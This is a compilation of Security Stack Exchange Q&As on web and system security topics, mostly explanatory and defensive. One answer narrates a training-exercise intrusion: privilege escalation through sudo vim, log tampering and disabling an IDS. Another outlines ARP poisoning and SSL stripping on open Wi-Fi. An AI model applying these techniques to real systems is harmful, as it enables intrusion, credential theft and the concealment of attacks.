I clearly understand that the security seals (VeriSign, Norton Secured, etc.) shown on banking and other websites are generated using a script and are available only after an SSL certificate is purchased and installed. The certificate vendors say "the seal helps improve your customers' perception of safety and trust". I just somehow cannot convince myself of this idea of 'perception of safety'. No user is going to click the seal every time to see whether it is really a seal issued by VeriSign, and most users will be unaware of this feature. The image can easily be faked on a phishing site. Yet the vendors claim that it is a protection mechanism against phishing and identity theft.
As Rook pointed out, security theatre is a big part of how consumer perception is exploited to ensure that customers believe that something is safe, without the vendor having to go through all that complicated hassle with actual security. The TSA is a great example, but there are many others:

- Extended Validation (EV) on SSL certificates is largely theatre, as the EV process does nothing to actually improve the cryptographic or algorithmic security of the transaction. If a 3rd party wants to get a certificate for the domain from a dodgy CA, they can do so without the EV and 99% of users wouldn't notice.

- The design of certain enterprise-level security appliances, from a physical and interactive perspective, is often tailored to invoke images of robustness. This usually involves building the unit out of sturdy black metal, with a few blinky blue lights on the front, and putting padlocks and other such imagery on the web panel.

- Bag searches at large events like concerts are largely security theatre. It's near impossible to get a few hundred people through a proper bag search process, so the staff take a quick look and let you through. More often than not, they're just trying to stop you bringing a big bottle of vodka, so you have to pay at the bar. But part of it is to make you feel safer, despite the fact that anyone could easily conceal weapons, drugs, etc. without detection.

- Anti-phishing techniques such as secret images are (usually) security theatre, in that it is often either trivial for a 3rd party to steal the secret image from the site without authentication, or the image is displayed only after the user has entered their full set of authentication credentials.

At the end of the day, it's all about marketing. If a company can sell you the image of something being more secure than it is, they are more likely to get a sale because you have peace of mind.
{ "source": [ "https://security.stackexchange.com/questions/33768", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21234/" ] }
33,783
I saw that some e-commerce scripts can also run without SSL, but everyone recommends activating it to protect sensitive data. I just saw a site that has an e-shop link; if I click it, my browser says that the security certificate is not reliable, and in fact if I click on "continue to the site" it switches to HTTP. Is it compulsory to activate SSL on a shop?
If you don't use HTTPS, but plain HTTP, then:

- You will get hacked; credit card numbers will be stolen while in transit, and customers will sue you into oblivion. You would be hacked anyway at some point, that's the lot of Web sites. Even if the hacker entered by some other way, post-mortem analysis will show the lack of SSL, and this will look really bad.

- You will lose customers. Many potential customers won't enter their credit card number, for lack of the reassuring padlock picture; they will instead shop at a competitor's Web site.

So you are not mandated by law to use HTTPS, but if you do not, your business will fail. Open business competition is quite akin to Darwinian selection: the weak die.

Edit: @XzKto's comment shows that I have not been completely clear: the SSL bit is needed for the actual transaction, when banking values (e.g. credit card numbers) travel over the Internet. That's the one I am talking about. If the site records payment details (so that you can come back and buy again without reentering the credit card number), then the "buy it now" button must also be SSL-protected (to avoid an attacker "clicking" on it in your name). The rest of the site need not necessarily be SSL-protected, although site-wide SSL is still often a good idea (it is much simpler than trying to work out which parts of the site must be protected, and which parts can be left out).
{ "source": [ "https://security.stackexchange.com/questions/33783", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24336/" ] }
33,811
Is it possible - in theory - to stop[1] a DDoS attack of any size? Many people claim it's impossible to stop DDoS attacks and tell me I just shouldn't mess with the wrong people on the internet. But what if, in five years or so, everyone is able to rent a botnet? Shouldn't we just re-think the whole internet architecture then?

[1]: By "stop" I also accept removing the negative effects, i.e. keeping the service running.
Imagine a shopping mall. By definition, anybody can enter the mall and then browse the shops. It is public. The shops are expecting people to come by, look at the displays, maybe enter and then buy things. In the mall, there is a shopkeeper, who sells, say, computers. Let's call him Jim. He wants people to come by and see the computers and be enticed into buying them. Jim is the nice guy in our story. Let there be Bob. Bob is a disgruntled nihilist who hates Jim. Bob would go to great lengths to make Jim unhappy, e.g. disrupting Jim's business. Bob does not have many friends, but he is smart, in his own twisted way. One day, Bob spends some money to make the local newspaper publish an ad; the ad states, in big fonts and vivid colours, that Jim runs a great promotion at the occasion of his shop's tenth birthday: the first one hundred customers who enter the shop will receive a free iPad . In order to cover his tracks, Bob performs his dealings with the newspaper under the pseudonym of "bob" (which is his name, but spelled backwards). The next day, of course, the poor Jim is submerged by people who want a free iPad. The crowd clogs Jim's shop but also a substantial part of the mall, which becomes full of disappointed persons who begin to understand that there is no such thing as a free iPad. Their negativeness makes them unlikely to buy anything else, and in any way they cannot move because of the press of the crowd, so business in the mall stops altogether. Jim becomes highly unpopular, with the ex-iPad-cravers, but also with his shopkeeper colleagues. Bob sniggers. At this point, Jim contacts the mall manager Sarah. Sarah decides to handle the emergency by calling the firemen. The firemen come with their shining helmets, flashing trucks, screaming sirens and sharp axes, and soon convince the crowd to disperse. Then, Sarah calls her friend Gunther. Gunther is a son of German immigrants, a pure product of the US Melting Pot, but more importantly he is a FBI agent, in charge of the issue. Gunther is smart, in his own twisted way. He contacts the newspaper, and is first puzzled, but then has an intuitive revelation: ah-HA! "bob" is just "Bob" spelled backwards ! Gunther promptly proceeds to arrest Bob and send him meet his grim but legal fate before the county Judge. Finally, in order to avoid further issues with other nihilists who would not be sufficiently deterred by the vision of Bob's dismembered corpse put on display in front of the mall, Sarah devises a mitigation measure: she hires Henry and Herbert, two mean-looking muscular young men, and posts them at the mall entries. Henry and Herbert are responsible for blocking access should a large number of people try to come in, beyond a given threshold. If a proto-Bob strikes again, this will allow the management of the problem on the outside , in the parking lot, where space is not lacking and crowd control much easier. Morality: a DDoS cannot be prevented, but its consequences can be mitigated by putting proactive measures, and perpetrators might be deterred through the usual, historically-approved display of muscle from law enforcement agencies. If botnets become too easy to rent, predictable consequences include increased police involvement, proactive authentication of users at infrastructure level, shutting off of the most disreputable parts of the network (in particular Internet access for the less cooperative countries), and a heavy dose of disgruntlement and sadness at the loss of a past, more civilized age.
{ "source": [ "https://security.stackexchange.com/questions/33811", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24362/" ] }
33,837
I have heard of the programmatic difference between GET and POST in web applications. Out of curiosity, which is more secure in web applications: the GET method or the POST method? I expect answers in terms of protocols too (i.e. in HTTP and HTTPS).
POST is more secure than GET for a couple of reasons. GET parameters are passed via the URL. This means that parameters are stored in server logs and browser history. When using GET, it is also very easy to alter the data being submitted to the server, as it is right there in the address bar to play with. The problem when comparing the security of the two is that POST may deter the casual user, but will do nothing to stop someone with malicious intent. It is very easy to forge POST requests, and they shouldn't be trusted outright. The biggest security issue with GET is not malicious intent of the end-user, but a third party sending a link to the end-user. I cannot email you a link that will force a POST request, but I most certainly can send you a link with a malicious GET request, e.g. "Click Here for the best free movies!". Edit: I just wanted to mention that you should probably use POST for most of your data. You would only want to use GET for parameters that should be shared with others, e.g. /viewprofile.php?id=1234 or /googlemaps.php?lat=xxxxxxx&lon=xxxxxxx
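To make the difference concrete, here is a small, hypothetical sketch using Python's requests library (the endpoint and parameter names are made up for illustration). With GET, the values end up in the URL itself — and therefore in proxy/server logs and browser history — while with POST they travel in the request body:

    # Minimal sketch (hypothetical endpoint): where do the parameters end up?
    import requests

    creds = {"user": "alice", "token": "s3cret"}

    # GET: parameters become part of the URL itself
    r1 = requests.get("https://example.com/login", params=creds)
    print(r1.url)   # https://example.com/login?user=alice&token=s3cret
                    # -> this exact string is what lands in logs and history

    # POST: parameters are carried in the request body instead
    r2 = requests.post("https://example.com/login", data=creds)
    print(r2.url)   # https://example.com/login  (no credentials in the URL)

Note that both still need HTTPS underneath; POST by itself does not encrypt anything.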
{ "source": [ "https://security.stackexchange.com/questions/33837", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11679/" ] }
33,860
I have been interested in information security. I was recently introduced to the idea of hashing. What I currently understand about hashing is that it takes the password a user enters, then randomly generates a "hash" using a bunch of variables, scrambling everything. Then, when you enter this password to log in, it matches that password to the hash. There are just a couple of things I don't understand about it. Why is it so hard to crack these hashes? I would assume that once you found the method they are using to encrypt it, you could reverse it (let's go with an extremely simple one like Caesar's cipher: once you find out how many places to shift over, you can do it for whole books). Even if it uses something like the current time and jumbles it, there are some really big ways you can limit the options (say they're using the Caesar cipher with the year mod x: you already know that realistically there are two possible years, so you just have to figure out the second piece of the puzzle). If hashes are generated randomly (even if two passwords are the same they come out differently), how can they tell if a password is correct? How are they cracked? How does hashcat know when it has successfully cracked the password? Related video (but it doesn't exactly answer my question): https://www.youtube.com/watch?v=b4b8ktEV4Bg
Quick, factor 1081. Or if you prefer, answer this: what's 23 times 47? Which one is easier? It's easier to perform a multiplication (just follow the rules mechanically) than to recover the operands given only the product. Multiplication. (This, by the way, is the foundation of some cryptographic algorithms such as RSA.) Cryptographic hash functions have different mathematical foundations, but they have the same property: they're easy to compute going forward (calculate H(x) given x), but practically impossible to compute going backward (given y, calculate x such that H(x) = y). In fact, one of the signs of a good cryptographic hash function is that there is no better way to find x than trying them all and computing H(x) until you find a match. Another important property of hash functions is that two different inputs have different hashes. So if H(x1) = H(x2), we can conclude that x1 = x2. Mathematically speaking, this is impossible — if the inputs are longer than the length of the hash, there have to be collisions. But with a good cryptographic hash function, there is no known way of finding a collision with all the computing resources in the world. If you want to understand more about cryptographic hash functions, read this answer by Thomas Pornin. Go on, I'll wait. Note that a hash function is not an encryption function. Encryption implies that you can decrypt (if you know the key). With a hash, there's no magical number that lets you go back. The main recommended cryptographic hash functions are SHA-1 and the SHA-2 family (which comes in several output sizes, mainly SHA-256 and SHA-512). MD5 is an older one, now deprecated because it has known collisions. Ultimately, there is no mathematical proof that they are indeed good cryptographic hash functions, only a widespread belief because many professional cryptographers have spent years of their life trying, and failing, to break them. Ok, that's one part of the story. Now a password hash is not directly a cryptographic hash function. A password hash function (PHF) takes two inputs: the password, and a salt. The salt is randomly generated when the user picks his password, and it is stored together with the hashed password PHF(password, salt). (What matters is that two different accounts always have different salts, and randomly generating a sufficiently large salt is a good way to have this property with overwhelming probability.) When the user logs in again, the verification system reads the salt from the password database, computes PHF(password, salt), and verifies that the result is what is stored in the database. The point of the salt is that if someone wants to crack a password, they'll have to know the hash before they can start, and they have to attack each account separately. The salt makes it impossible to perform a lot of cracking work in advance, e.g. by generating a rainbow table. This answers (2) and (3) — the legitimate verifier and the attacker find out in the same way whether the password (entered by the user, or guessed by the attacker) is correct. A final point in the story: a good password hash function has an additional property, it must be slow. The legitimate server only needs to compute it once per login attempt, whereas an attacker has to compute it once per guess, so the slowness hurts the attacker more (which is necessary, because the attacker typically has more, specialized hardware). If you ever need to hash passwords, don't invent your own method.
Use one of the standard methods: scrypt, bcrypt or PBKDF2.
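To make the salt-plus-slow-hash idea concrete, here is a minimal sketch using the PBKDF2 implementation from Python's standard library. The parameter values are illustrative only; a real deployment should follow current guidance on iteration counts or use scrypt/bcrypt/argon2 via a maintained library:

    # Minimal sketch of salted, deliberately slow password hashing with PBKDF2.
    import hashlib, hmac, os

    def hash_password(password: str):
        salt = os.urandom(16)   # random per-user salt, stored alongside the hash
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
        return salt, digest

    def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
        return hmac.compare_digest(candidate, stored)   # constant-time comparison

    salt, stored = hash_password("correct horse battery staple")
    print(verify_password("correct horse battery staple", salt, stored))  # True
    print(verify_password("wrong guess", salt, stored))                   # False

The verifier and the attacker both have to redo this exact computation for every candidate password, which is precisely why the deliberate slowness and the per-user salt matter.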
{ "source": [ "https://security.stackexchange.com/questions/33860", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20867/" ] }
34,030
There's been a lot of buzz around this recent CNN article about Shodan, a search engine that can find and allow access to unsecured internet-connected devices. Shodan runs 24/7 and collects information on about 500 million connected devices and services each month. It's stunning what can be found with a simple search on Shodan. Countless traffic lights, security cameras, home automation devices and heating systems are connected to the Internet and easy to spot. Shodan searchers have found control systems for a water park, a gas station, a hotel wine cooler and a crematorium. Cybersecurity researchers have even located command and control systems for nuclear power plants and a particle-accelerating cyclotron by using Shodan. What's really noteworthy about Shodan's ability to find all of this -- and what makes Shodan so scary -- is that very few of those devices have any kind of security built into them. [...] A quick search for "default password" reveals countless printers, servers and system control devices that use "admin" as their user name and "1234" as their password. Many more connected systems require no credentials at all -- all you need is a Web browser to connect to them. It sounds to me like some of these devices have been secured ostensibly but aren't actually secure because the passwords, etc., are obvious and/or unchanged from default settings. How can I (either as a "normal" person or a professional) take steps to prevent my devices from being accessible by crawlers like Shodan? Are there other ways to mitigate my risk of discovery by something like Shodan?
Shodan references publicly available machines which work like this: (the original answer illustrated the point with an image here). Just don't do it. Edit: the analogy is relevant! Shodan connects to machines and asks for their "banner", a publicly available text which may simply say: "to enter, use this default password: 1234". You might want to avoid people knocking at the door by the simple expedient of installing a giant squid as a guard before the door (metaphorically, a firewall), but, really, it would be much safer to configure a non-default password.
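If you want to see what kind of banner one of your own machines hands out to anyone who asks — which is essentially all Shodan collects — a minimal sketch looks like this. The host and port below are placeholders, and you should only point it at hosts you own:

    # Minimal banner-grab sketch: connect, read whatever the service volunteers, disconnect.
    # host and port are placeholders; only test machines you own.
    import socket

    host, port = "192.0.2.10", 21   # e.g. an FTP service on one of your own boxes

    with socket.create_connection((host, port), timeout=5) as s:
        s.settimeout(5)
        try:
            banner = s.recv(1024)
        except socket.timeout:
            banner = b""
    print(banner.decode(errors="replace"))

If the output contains version strings, default-credential hints, or a login prompt that needs no credentials at all, that is exactly what a Shodan crawler would index.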
{ "source": [ "https://security.stackexchange.com/questions/34030", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5349/" ] }
34,202
On a Linux-based server, I follow the basic practices below:

1. Make the admin account password long and complicated enough (i.e. theoretically speaking, the password cannot be cracked within a reasonable time).
2. Monitor all incoming network traffic to the administrative files.
3. To extend the layer of protection from #2 above, monitor local file changes (especially ones that involve commands requiring sudo privileges).
4. Validate all user input, so that all of the user input is guaranteed to be safe.

As a novice developer, I don't understand how hacking is even feasible if the server admin practices the above.
Not making sure all security updates are applied? Remember, as the defender, you must win 100% of the time. A hacker only needs to win once. The steps you listed are also a lot easier said than done (except the password thing... and yet people still choose horrible passwords!).

2) Also, what's a "credible source" for a public-facing web server? The entire Internet? The entire Internet, sans China/Russia (/some/other/countries)? Automated systems can detect many types of attacks, but just like antivirus they can only go so far.

3) Monitoring local files is good, but, again, it's not a panacea. What if the attacker manages to inject code into the web server, and then uses a kernel bug to get code into the kernel... without ever writing a file to the disk? At that point, they could write files to the disk, and use a rootkit to prevent most (theoretically all) online scans from noticing any changes to the system. And even if they only manage to exploit the web server, they can do everything the web server can do (which might be all the attacker was interested in anyway).

4) You should always validate user input. Most developers know this (and many try to do it). Sadly, it's much easier said than done, which is why we continue to see issue after issue where user input isn't appropriately validated. You'll never be able to guarantee any real piece of software is correctly validating all user input. Read some PHP+MySQL questions on Stack Overflow to see how many people think mysqli_real_escape_string() prevents all SQL injection attacks ("where ID = " . $val is vulnerable, even when $val is the output of mysqli_real_escape_string!). Even if you could (you can't) ensure every known attack vector was guarded against, you can't do anything more than wildly swing in the dark against an unknown-unknown (well, continually educating yourself helps).

As an example where your defenses wouldn't have done anything: I was taking part in a security course where we were doing "war games". I was able to root an opposing team's server by getting one of their user passwords off another machine (one of them screwed up and typed it into bash as a command by mistake, and they never thought to delete it from .bash_history). From there, I spoofed the IP of the machine they usually logged in from, and SSHed in, entering their username + password. I had limited access to the system. I then ran sudo vim, entered the same password again, and had vim spawn a bash shell. Tada! Root access, from a credible source, without modifying any local files in an unusual way, without exploiting a weak password (it was bad, but even the best password in the world wouldn't have helped), nor relying on unvalidated user input. At that point, being mischievous me, I manually modified all the log files related to my legitimate login, and obliterated their IDS (I'm betting they won't be observant enough to notice I replaced all of its binaries with copies of /bin/true!). A 'real' hacker would likely be far better equipped to ensure their activity wasn't detected by more vigilant admins, but I'd already accomplished my goal, and a small part of me wanted them to find out that someone got in.
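Coming back to point 4: the safest pattern is usually not escaping at all but parameterized queries, where the database driver keeps data separate from the SQL text. A minimal sketch of the difference, shown here with Python and SQLite purely for illustration rather than the PHP/MySQL code mentioned above:

    # Minimal sketch: string concatenation vs. a parameterized query (Python + SQLite for illustration).
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'alice')")

    user_supplied = "1 OR 1=1"          # attacker-controlled input

    # Vulnerable: the input is pasted straight into the SQL text
    rows_bad = conn.execute("SELECT * FROM users WHERE id = " + user_supplied).fetchall()
    print(rows_bad)                     # returns every row -- the WHERE clause was subverted

    # Safer: the input is passed as a bound parameter, never interpreted as SQL
    rows_ok = conn.execute("SELECT * FROM users WHERE id = ?", (user_supplied,)).fetchall()
    print(rows_ok)                      # [] -- '1 OR 1=1' is treated as a (non-matching) value

Parameterization removes one whole class of input-handling mistakes, but as the answer above argues, it still does nothing about the other ways in.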
{ "source": [ "https://security.stackexchange.com/questions/34202", "https://security.stackexchange.com", "https://security.stackexchange.com/users/24668/" ] }
34,419
In computer security, we know that weak points in software are called vulnerabilities (if related to security). And once the vulnerability is found, theoretically it requires a piece of code as proof of concept (this is called an exploit ). In this context, the term payload is also mentioned. Then, what is the difference between 'payload' and 'exploit'?
The exploit is what delivers the payload. Take a missile as an analogy. You have the rocket and fuel and everything else in the rocket, and then you have the warhead that does the actual damage. Without the warhead, the missile doesn't do very much when it hits. Additionally, a warhead isn't much use if it goes off in your bunker without a rocket delivering it. The delivery system(missile) is the exploit and the payload (warhead) is the code that actually does something. Exploits give you the ability to 'pop a shell/run your payload code'. Example payloads are things like Trojans/RATs, keyloggers, reverse shells etc. Payloads are only referred to when code execution is possible and not when using things like denial of service exploits.
{ "source": [ "https://security.stackexchange.com/questions/34419", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20070/" ] }
34,523
While looking for solutions to entropy pool depletion on virtual machines, I came across an interesting project called haveged , which is based on the HAVEGE algorithm (HArdware Volatile Entropy Gathering and Expansion). It makes a pretty fantastic claim. HAVEGE is a random number generator that exploits the modifications of the internal CPU hardware states (caches, branch predictors, TLBs) as a source of uncertainty. During an initialization phase, the hardware clock cycle counter of the processor is used to gather part of this entropy: tens of thousands of unpredictable bits can be gathered per operating system call in average. If this really produces nearly unlimited high-quality entropy on headless virtual machines, it should be included in every server distribution by default! And yet, some people have raised concerns. "At its heart, [HAVEGE] uses timing information based on the processor's high resolution timer (the RDTSC instruction). This instruction can be virtualized, and some virtual machine hosts have chosen to disable this instruction, returning 0s or predictable results." (Source: PolarSSL Security Advisory 2011-02 on polarssl.org). And furthermore, popular NIST and ENT tests will sometimes give haveged a PASS even when it's intentionally mis-configured, and not actually producing random numbers! I replaced the “HARDTICKS” macro in HAVEGE with the constant 0 (zero) rather than reading the time stamp counter of the processor. This immediately failed the randomness test. However, when I used the constant 1 (one) instead, the ent test passed. And even nist almost passed with only a single missed test out of the 426 tests executed. (Source: Evaluating HAVEGE Randomness on engbloms.se). So, which virtualization platforms/hypervisors are safe to use with haveged in a virtual machine? And is there a generally accepted best practice way to test whether a source of randomness is producing sufficiently high quality numbers?
( Caveat: I certainly don't claim that HAVEGE lives up to its claims. I have not checked their theory or implementation.) To get randomness, HAVEGE and similar systems feed on "physical events", and in particular on the timing of physical events. Such events include occurrences of hardware interrupts (which, in turn, gathers data about key strokes, mouse movements, incoming ethernet packets, time for a hard disk to complete a write request...). HAVEGE also claims to feed on all the types of cache misses which occur in a CPU (L1 cache, L2 cache, TLB, branch prediction...); the behaviour of these elements depends on what the CPU has been doing in the previous few thousands clock cycles, so there is potential for some "randomness". This hinges on the possibility to measure current time with great precision (not necessarily accuracy), which is where the rdtsc instruction comes into play. It returns the current contents of an internal counter which is incremented at each clock cycle, so it offers sub-nanosecond precision. For a virtual machine system, there are three choices with regards to this instruction: Let the instruction go to the hardware directly. Trap the instruction and emulate it. Disable the instruction altogether. If the VM manager chooses the first solution, then rdtsc has all the needed precision, and should work as well as if it was on a physical machine, for the purpose of gathering entropy from hardware events. However, since this is a virtual machine, it is an application on the host system; it does not get the CPU all the time. From the point of view of the guest operating system using rdtsc , this looks as if its CPU was "stolen" occasionally: two successive rdtsc instructions, nominally separated by a single clock cycles, may report an increase of the counter by several millions . In short words, when rdtsc is simply applied on the hardware, then the guest OS can use it to detect the presence of an hypervisor. The second solution is meant to make the emulation more "perfect" by maintaining a virtual per-VM cycle counter, which keeps track of the cycles really allocated to that VM. The upside is that rdtsc , from the point of view of the guest, will no longer exhibit the "stolen cycles" effect. The downside is that this emulation is performed through triggering and trapping a CPU exception, raising the cost of the rdtsc opcode from a few dozen clock cycles (it depends on the CPU brand; some execute rdtsc in less than 10 cycles, other use 60 or 70 cycles) to more than one thousand of cycles. If the guest tries to do a lot of rdtsc (as HAVEGE will be prone to do), then it will slow down to a crawl. Moreover, the exception handling code will disrupt the measure; instead of measuring the hardware event timing, the code will measure the execution time of the exception handler, which can conceivably lower the quality of the extracted randomness. The third solution (disabling rdtsc ) will simply prevent HAVEGE from returning good randomness. Since it internally uses a PRNG , the output may still fool statistical analysis tools, because there is a huge difference between "looking random" and "being unpredictable" (statistical analysis tools follow the "look random" path, but cryptographic security relies on unpredictability). The VirtualBox manual claims that VirtualBox, by default, follows the first method ( rdtsc is unconditionally allowed and applied on the hardware directly), but may be configured to apply the second solution (which you don't want, in this case). 
To test what your VM does, you can try this small program (compile with gcc -W -Wall -O on Linux; the -O is important):

    #include <stdio.h>

    #if defined(__i386__)
    static __inline__ unsigned long long rdtsc(void)
    {
        unsigned long long int x;
        __asm__ __volatile__ (".byte 0x0f, 0x31" : "=A" (x));
        return x;
    }
    #elif defined(__x86_64__)
    static __inline__ unsigned long long rdtsc(void)
    {
        unsigned hi, lo;
        __asm__ __volatile__ ("rdtsc" : "=a"(lo), "=d"(hi));
        return ((unsigned long long)lo) | (((unsigned long long)hi) << 32);
    }
    #endif

    int main(void)
    {
        long i;
        unsigned long long d;

        d = 0;
        for (i = 0; i < 1000000; i ++) {
            unsigned long long b, e;

            b = rdtsc();
            e = rdtsc();
            d += e - b;
        }
        printf("average : %.3f\n", (double)d / 1000000.0);
        return 0;
    }

On a non-virtual machine, with the "true" rdtsc, this shall report a value between 10 and 100, depending on the CPU brand. If the reported value is 0, or if the program crashes, then rdtsc is disabled. If the value is in the thousands, then rdtsc is emulated, which means that the entropy gathering may not work as well as expected. Note that even getting a value between 10 and 100 is not a guarantee that rdtsc is not emulated, because the VM manager, while maintaining its virtual counter, may subtract from it the expected time needed for execution of the exception handler. Ultimately, you really need to have a good look at the manual and configuration of your VM manager. Of course, the whole premise of HAVEGE is questionable. For any practical security, you need a few "real random" bits, no more than 200, which you use as seed in a cryptographically secure PRNG. The PRNG will produce gigabytes of pseudo-alea indistinguishable from true randomness, and that's good enough for all practical purposes. Insisting on going back to the hardware for every bit looks like yet another outbreak of that flawed idea which sees entropy as a kind of gasoline, which you burn up when you look at it.
{ "source": [ "https://security.stackexchange.com/questions/34523", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1092/" ] }
34,567
How is the support for ECC (Elliptic Curve Cryptography) in (Open)PGP so far? It seems that GnuPG (The GNU Privacy Guard) doesn't have an official implementation - but I did find the gnupg-ecc project (ECC-enabled GnuPG per RFC 6637) on Google Code:

This project brought to life Elliptic Curve Cryptography support in OpenPGP as an end-user feature. Users can simply select an ECC key generation option in gpg2 --gen-key and then use the generated public key as they normally would use any other public key, as shown here.

I know that Symantec supports ECC. Are there reasons not to use ECC?

EDIT: I did some more research and found out that ECC found its way into the main line of GnuPG a long time ago, but only in the developer version:

    $ gpg2 --expert --gen-key
    gpg: NOTE: THIS IS A DEVELOPMENT VERSION!
    gpg: It is only intended for test purposes and should NOT be
    gpg: used in a production environment or with production keys!
    Please select what kind of key you want:
       (1) RSA and RSA (default)
       (2) DSA and Elgamal
       (3) DSA (sign only)
       (4) RSA (sign only)
       (7) DSA (set your own capabilities)
       (8) RSA (set your own capabilities)
       (9) ECDSA and ECDH
      (10) ECDSA (sign only)
      (11) ECDSA (set your own capabilities)
    Your selection?
I see two main reasons why you might not want to use ECC : Practical reason: communication necessarily involves two parties, the sender and the receiver. ECC can be used only if both sender and receiver support it. As you noticed, existing, deployed implementations are not necessarily up to it yet; if you use an ECC public key, people may send you messages encrypted with that key, or verify your signatures with that key, only if their OpenPGP implementation includes the relevant code. So your choice of ECC or not ECC depends on whether you want to maximize interoperability or prefer to be an "early adopter" (although in the case of ECC, really early adopters are already there; ECC is becoming mainstream). Moral reason: mathematically, we don't have proof that any of the cryptographic algorithms that we employ is really robust against attacks. We don't even know if it is mathematically possible to be robust against attacks. Right now, the only method we have to assess the strength of any cryptographic algorithm is to define it, and then let a lot of cryptographers work on it for some years. If none of these smart people found anything wrong with the algorithm, then you can know that if the algorithm is weak, then, at least, it is not obviously weak. Elliptic Curves have been proposed as objects suitable for cryptography in 1985 (by Koblitz and Miller, independently). The mathematics of elliptic curves have been studied for about 40 years before that. So ECC can sport about 70 years of exposure, 30 of which in a definitely cryptographic setting. That's not bad. Integer factorization , on which RSA is based, can boast 35 years of cryptographic exposure (RSA was proposed in 1978), and more than a whooping 2500 years for the underlying mathematics. Therefore it may be argued that the security of RSA is "more understood" than that of elliptic curves. Personally, I think that ECC is mature enough to be deployed, and since ECC are highly fashionable, implementations become commonplace and we can expect GnuPG to soon align itself. Thus, my recommendation is: ECC is fine, as long as you are ready to encounter some interoperability issues for a few years. (One dark spot of ECC deployment is that there are very few "generic" ECC implementations; most implementations are specific to a restricted set of supported curves, often restricted to the two NIST P-256 and P-384 curves. The choice of curve for your key thus has a non-trivial impact on interoperability. P-256 is fine for security, though, so you can use it and stop worrying.)
{ "source": [ "https://security.stackexchange.com/questions/34567", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3394/" ] }
34,764
For a few days, my mobile device has been able to pick up a Wi-Fi signal within its range. It does not ask for a password to use the service, so I have been using the Wi-Fi whenever I need to. Is there any chance that my email and other accounts, which I'm accessing over this service, could be hacked? Are there any other security issues with this type of access?
Unprotected Wi-Fi networks, particularly in public places, are most certainly a threat. This is because you are connecting to a network without knowing who else could be on the network. 'Free Wi-Fi' provided by cafes, restaurants, etc. serves as an excellent place for harvesting passwords. The attacker will perform a Man-in-the-Middle attack, typically by employing ARP cache poisoning. At that point, the attacker can read all plaintext passwords, including unsecured email (email that does not use TLS), unencrypted FTP, websites without SSL, etc. Not to mention they can see all your Google searches, all domains that you visit (encrypted or not) and so forth. And they got to this point without putting in any real effort; ARP cache poisoning and packet sniffing are easy. A more advanced attacker might set up an active proxy on his machine to perform attacks such as SSL stripping, which would give him access to all sites you visit, including HTTPS. This means he now has your PayPal, Facebook and Twitter passwords. Moving on, an attacker might target your machine directly. If you have not updated your software in a while, it is likely that he can spawn a shell with Metasploit and download all your files for later analysis. This includes any saved browser passwords, authentication cookies, bank statements, etc. TL;DR: When connecting to a network, you are exposing your device and all your traffic to all other users of that network. On an open Wi-Fi network this includes the girl sat across the street in the back of a van with a Kali laptop and a GPU array. Update your software and don't log into anything sensitive without using a VPN.
{ "source": [ "https://security.stackexchange.com/questions/34764", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25117/" ] }
34,972
Why is Ctrl + Alt + Del required at login on certain Windows systems (I have not seen it elsewhere, but contradict me if I'm wrong) before the password can be typed in? From a usability point of view, it's a bad idea as it's adding an extra step in getting access. Does it improve security in any way, and if so, how?
This combination is called a Secure attention key . The Windows kernel is "wired" to notify Winlogon and nobody else about this combination. In this way, when you press Ctrl + Alt + Del , you can be sure † that you're typing your password in the real login form and not some other fake process trying to steal your password. For example, an application which looks exactly like the windows login. In Linux, there's a loosely-defined equivalent which is Ctrl + Alt + Pause . However, it doesn't exactly do the same thing. It kills everything except where you're trying to input your password. So far, there's no actual equivalent that would work when running X . † This implies a trust in the integrity of the system itself, it's still possible to patch the kernel and override this behaviour for other purposes (malicious or completely legitimate)
{ "source": [ "https://security.stackexchange.com/questions/34972", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6138/" ] }
35,036
If I run OpenSSL 1.0.1e like this (i.e. without the EVP API):

    $ ./openssl speed aes-256-cbc
    Doing aes-256 cbc for 3s on 16 size blocks: 14388425 aes-256 cbc's in 3.00s
    Doing aes-256 cbc for 3s on 64 size blocks: 3861764 aes-256 cbc's in 2.99s
    Doing aes-256 cbc for 3s on 256 size blocks: 976359 aes-256 cbc's in 3.00s
    Doing aes-256 cbc for 3s on 1024 size blocks: 246145 aes-256 cbc's in 2.99s
    Doing aes-256 cbc for 3s on 8192 size blocks: 30766 aes-256 cbc's in 3.00s

However, if I run it like this:

    $ ./openssl speed -evp AES256
    Doing aes-256-cbc for 3s on 16 size blocks: 71299827 aes-256-cbc's in 3.00s
    Doing aes-256-cbc for 3s on 64 size blocks: 18742055 aes-256-cbc's in 2.99s
    Doing aes-256-cbc for 3s on 256 size blocks: 4771917 aes-256-cbc's in 2.99s
    Doing aes-256-cbc for 3s on 1024 size blocks: 1199158 aes-256-cbc's in 3.00s
    Doing aes-256-cbc for 3s on 8192 size blocks: 150768 aes-256-cbc's in 2.99s

the EVP version is much faster. From the OpenSSL documentation, it seems that using EVP for the same cipher or not using EVP should not make any difference. Yes, I see this consistently. Can anyone please provide an insight? I have googled a lot but could not find anything. I will look through the code, but I am not sure I can understand that part.
In OpenSSL source code, the speed aes-256-cbc function calls AES_cbc_encrypt() which itself uses AES_encrypt() , a function from crypto/aes/aes_x86core.c . It is an obvious "classical" implementation with tables. On the other hand, with EVP, you end up in the code in crypto/evp/e_aes.c which dynamically detects whether the current CPU supports the AES-NI instructions , a feature of recent x86 processors, which allow for vastly improved performance. In OpenSSL code, the AESNI_CAPABLE macro does the job (feeding on some flags which are set when the library is initialized, using CPUID ). Bottom-line: with EVP, you benefit from the automatic selection of the improved implementation, based on the current CPU model, whereas the non-EVP code directly uses the generic software implementation, which works everywhere, but is slower.
